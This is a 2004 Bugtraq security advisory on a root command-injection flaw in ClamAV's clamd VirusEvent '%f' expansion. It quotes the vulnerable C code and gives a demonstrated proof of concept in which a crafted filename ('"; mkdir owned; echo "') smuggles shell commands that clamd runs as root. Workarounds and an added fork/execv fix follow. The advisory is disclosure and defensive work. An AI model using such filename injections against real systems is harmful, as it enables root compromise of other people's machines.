
List:       bugtraq
Subject:    clamd - NEVER use "%f" in your "VirusEvent"
From:       Rene <l0om () excluded ! org>
Date:       2004-03-30 12:34:18
Message-ID: 20040330123418.12944.qmail () search ! securityfocus ! com



date: 30 March 2004
product: clam antivirus
author: l0om  -  l0om[at]excluded.org  -  www.excluded.org

#####################################################################
clam antivirus is an antivirus program (which works very well). it comes with a lot of features and it's easy to handle. normally you start it from the command line on demand, but if you use the dazuko module you can also scan in realtime. the program runs as root by default, but you can drop its privileges if you want to.

in the clamav.conf we can find the "VirusEvent" directive (which is disabled by default):


# Execute a command when virus is found. In the command string %v and %f will
# be replaced by the virus name and the infected file name respectively.
#
# SECURITY WARNING: Make sure the virus event command cannot be exploited,
#                   eg. by using some special file name when %f is used.
#                   Always use a full path to the command.
#                   Never delete/move files with this directive !
# VirusEvent /usr/bin/send_sms 1214131 "VIRUS DETECTED: %f: %v"

"Make sure the virus event command cannot be exploited,
eg. by using some special file name when %f is used."
 
this is not enough. they should delete this "%f" feature for security reasons because in my opinion, for now, you nearly can't prevent the "%f" thing from breaking out of your VirusEvent and doing whatever the attacker likes to.

#####################################################################
void virusaction(const char *filename, const char *virname, const struct cfgstruct *copt) {
 [...]
    buffer = (char *) mcalloc(strlen(cmd) + strlen(filename) + strlen(virname) + 10, sizeof(char));

    if((pt = strstr(cmd, "%f"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);            /* <---- */
        strcat(buffer, filename);       /* <---- filename is pasted in unchanged: no quoting, no filtering */
        strcat(buffer, pt);             /* <---- */
        free(cmd);
        cmd = strdup(buffer);
    }

    if((pt = strstr(cmd, "%v"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);
        strcat(buffer, virname);
        strcat(buffer, pt);
        free(cmd);
        cmd = strdup(buffer);
    }

    free(buffer);

    /* WARNING: this is uninterruptable ! */
    system(cmd);   /* <---- the assembled string is handed to /bin/sh -c */
    free(cmd);
}
#####################################################################

as we can see in the source code there is no filter for shell characters like ";" or " in the program. therefore an attacker may take a look at your VirusEvent (as your clamav.conf is world-readable) and create a file named " ; chmod 777 etc" for example and put some virus in it. as we can see above, clamd will execute the buffer. the attacker can't use paths like "/" but he has what it takes to get root or kill the system.

the commands will be executed by the clamd on "/" as the process makes a chdir("/").

#####################################################################
example:

l0om:~> ls -l /usr/local/etc/clamav.conf
-rw-r--r--    1 root     root         6863 2004-03-27 11:27 /usr/local/etc/clamav.conf

l0om:~> cat /usr/local/etc/clamav.conf
[...]
# Execute a command when virus is found. In the command string %v and %f will
# be replaced by the virus name and the infected file name respectively.
#
# SECURITY WARNING: Make sure the virus event command cannot be exploited,
#                   eg. by using some special file name when %f is used.
#                   Always use a full path to the command.
#                   Never delete/move files with this directive !
VirusEvent /bin/echo "Virus: %f: %v" | /usr/bin/mail -s "VIRUS ALERT" admin@network.net

# Run as selected user (clamd must be started by root).
# By default it doesn't drop privileges.
#User clamav
[...]

l0om:~> cat >" \"; mkdir owned; echo \""
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

l0om:~> ls
 "; mkdir owned; echo "  XXX.blow_balls_4_real.mpeg   XxX.admin_and_amanda_backup_deamon_having_fun.avi

# on realtime scanning the file will be scanned when we close it or open it for reading. # [...whatever- on next virus scan]

l0om:~> ls -ld /owned
drwxrwxrwx    2 root     root           48 2004-03-30 11:29 owned
#####################################################################

workaround:
- don't use the VirusEvent
- don't use the "%f" in the VirusEvent(!)
- start events with your own script parsing clamd's log file manually
######################################################################

have phun everybody!
   anyone at the NoFX concert or on the deconstruction tour in Köln?  PARTY ON!

-- l0om
-- www.excluded.org
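
As an added example (not clamd's code and not from the original post), a replacement for the system()-based virusaction() above: the VirusEvent template is split into argv and run with fork()/execv(), so the %f expansion becomes a single literal argument and a filename like the post's `"; mkdir owned; echo "` never reaches a shell, at the price that shell syntax in the template (the `| /usr/bin/mail` pipe above) would need a wrapper script. The function names and the sample virus name in the comments are assumptions.

```c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#define MAX_ARGS 32

/* Expand %f / %v inside ONE argv token. The result is handed to execv() as a
 * single argument, so ';', '"', '|' or spaces in filename stay literal bytes. */
static char *expand_token(const char *tok, const char *filename, const char *virname) {
    size_t cap = strlen(tok) + 1;
    for (const char *p = tok; *p; p++)
        if (*p == '%' && (p[1] == 'f' || p[1] == 'v'))
            cap += strlen(p[1] == 'f' ? filename : virname);
    char *out = malloc(cap), *o = out;
    if (!out) return NULL;
    for (const char *p = tok; *p; p++) {
        if (*p == '%' && (p[1] == 'f' || p[1] == 'v')) {
            const char *s = (p[1] == 'f') ? filename : virname;
            size_t n = strlen(s);
            memcpy(o, s, n); o += n; p++;   /* skip the 'f' / 'v' */
        } else *o++ = *p;
    }
    *o = '\0';
    return out;
}

/* Split the VirusEvent template on whitespace into argv. No shell ever sees the
 * string, so pipes and redirections in the template are NOT supported. */
int build_argv(const char *tmpl, const char *filename, const char *virname, char **argv, int max) {
    char *copy = malloc(strlen(tmpl) + 1);
    int n = 0;
    if (!copy) return -1;
    strcpy(copy, tmpl);
    for (char *t = strtok(copy, " \t"); t && n < max - 1; t = strtok(NULL, " \t"))
        argv[n++] = expand_token(t, filename, virname);   /* e.g. virname "Eicar-Test-Signature" (sample) */
    argv[n] = NULL;
    free(copy);
    return n;
}

void free_argv(char **argv) { for (int i = 0; argv[i]; i++) free(argv[i]); }

/* fork()+execv() instead of system(): returns the command's exit status, -1 on error. */
int run_virus_event(const char *tmpl, const char *filename, const char *virname) {
    char *argv[MAX_ARGS]; int status = -1;
    if (build_argv(tmpl, filename, virname, argv, MAX_ARGS) < 1) return -1;
    pid_t pid = fork();
    if (pid == 0) { execv(argv[0], argv); _exit(127); }   /* 127: command not found */
    if (pid > 0) waitpid(pid, &status, 0);
    free_argv(argv);
    return (pid > 0 && WIFEXITED(status)) ? WEXITSTATUS(status) : -1;
}
```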

